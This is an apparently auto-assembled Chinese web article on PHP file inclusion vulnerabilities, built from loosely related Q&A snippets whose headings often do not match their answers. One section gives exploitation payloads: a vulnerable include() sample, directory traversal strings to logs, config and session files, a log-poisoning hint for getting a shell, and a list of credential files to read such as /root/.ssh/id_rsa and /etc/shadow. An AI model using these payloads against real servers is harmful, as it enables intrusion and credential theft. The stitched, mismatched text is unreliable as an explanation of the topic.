文件包含漏洞與php封裝協議,php包含漏洞能直接造成的危害

本文目錄一覽：

1、如何查找php文件包含漏洞的方法
2、php文件包含漏洞可能造成的危害有哪些
3、電腦發現漏洞怎麼修復不了？
4、文件包含漏洞形成的原因是什麼
5、zimbra內部文件包含漏洞怎麼創建用戶

如何查找php文件包含漏洞的方法

找360或安全聯盟檢測接口，免費的。

主要是查上傳漏洞。可以百度下，夠學習一段時間的。

php文件包含漏洞可能造成的危害有哪些

在接下來的內容中會以代碼樣本作為例子，來給大家介紹各種奇葩猥瑣的利用姿勢。

0x01 普通本地文件包含

?php

include(“inc/”

. $_GET[‘file’]);

包含同目錄下的文件：

?file=.htaccess

目錄遍歷：

?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db

（Linux中這兩個文件儲存着所有文件的路徑，需要root權限）

包含錯誤日誌： ?file=../../../../../../../../../var/log/apache/error.log （試試把UA設置為“”來使payload進入日誌）

獲取web目錄或者其他配置文件：

?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf

（更多→）

包含上傳的附件：

?file=../attachment/media/xxx.file

讀取session文件：

?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7

（session文件一般在/tmp目錄下，格式為sess_[your phpsessid value]，有時候也有可能在/var/lib/php5之類的，在此之前建議先讀取配置文件。在某些特定的情況下如果你能夠控制session的值，也許你能夠獲得一個shell）

如果擁有root權限還可以試試讀這些東西：

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]* (文件標識符)

/proc/mounts

/proc/config.gz

如果有phpinfo可以包含臨時文件：

參見

電腦發現漏洞怎麼修復不了？

造成這個情況的原因有很多。比如修復之後沒有將電腦重啟，或者電腦缺少一些文件導致修復失敗。那麼解決方法就是找到缺失的文件重新修復下，然後將電腦重啟下即可。

文件包含漏洞形成的原因是什麼

導致系統漏洞的原因包括程序邏輯結構設計不合理，不嚴謹、編程人員程序設計錯誤以及目前為止硬件無法解決特定的問題：

1、編程人員在設計程序時，對程序邏輯結構設計不合理，不嚴謹，因此產生一處或者多處漏洞，正是由於這些漏洞，給病毒入侵用戶電腦提供了入口。

2、編程人員的程序設計錯誤也是計算機系統漏洞產生的原因之一，受編程人員的能力、經驗和當時安全技術所限，在程序中難免會有不足之處，輕則影響程序效率，重則導致非授權用戶的權限提升，這種類型的漏洞最典型的是緩衝區溢出漏洞，它也是被黑客利用得最多的一種類型的漏洞。

3、由於目前硬件無法解決特定的問題，使編程人員只得通過軟件設計來表現出硬件功能而產生的漏洞，也會讓黑客長驅直入，攻擊用戶的電腦。

擴展資料：

漏洞的影響範圍很廣，包括系統本身及其支持軟件、網絡客戶端和服務器軟件、網絡路由器和安全防火牆。

在不同類型的硬件和軟件設備、相同設備的不同版本、不同的系統由不同的設備組成，以及同一系統在不同的設置下，都會存在不同的安全漏洞。

因此，隨着時間的推移，舊的系統漏洞會消失，新的系統漏洞會繼續出現。系統中的漏洞也依然存在。

zimbra內部文件包含漏洞怎麼創建用戶

服務器通過php的特性（函數）去包含任意文件時，由於要包含的這個文件來源過濾不嚴，從而可去包含一個惡意文件，而我們可以構造這個惡意文件來達到邪惡的目的。幾乎所有的 cgi程序都有這樣的 bug，只是具體的表現方式不一樣罷了。

涉及到的危險函數：〔include(),require()和include_once(),require_once()〕

include() require()語句:包括並運行指定文件。

這兩種結構除了在如何處理失敗之外完全一樣。include() 產生一個警告而 require() 則導致一個致命錯誤。換句話說，如果你想在遇到丟失文件時停止處理頁面就用 require()。include() 就不是這樣，腳本會繼續運行。

如果”allow_url_fopen”在 PHP 中被激活（默認配置），也可以用 URL（通過 HTTP或者其它支持的封裝協議）而不是本地文件來指定要被包括的文件。如果目標服務器將目標文件作為 PHP 代碼解釋，則可以用適用於HTTP GET 的URL 請求字符串來向被包括的文件傳遞變量。

require_once()　＆＆　include_once()require_once ()和include_once() 語句在腳本執行期間包括並運行指定文件。此行為和 require()語句類似，唯一區別是如果該文件中的代碼已經被包括了，則不會再次包括。適用於在腳本執行期間同一個文件有可能被包括超過一次的情況下，你想確保它只被包括一次以避免函數重定義，變量重新賦值等問題。

原創文章，作者：小藍，如若轉載，請註明出處：https://www.506064.com/zh-hant/n/157307.html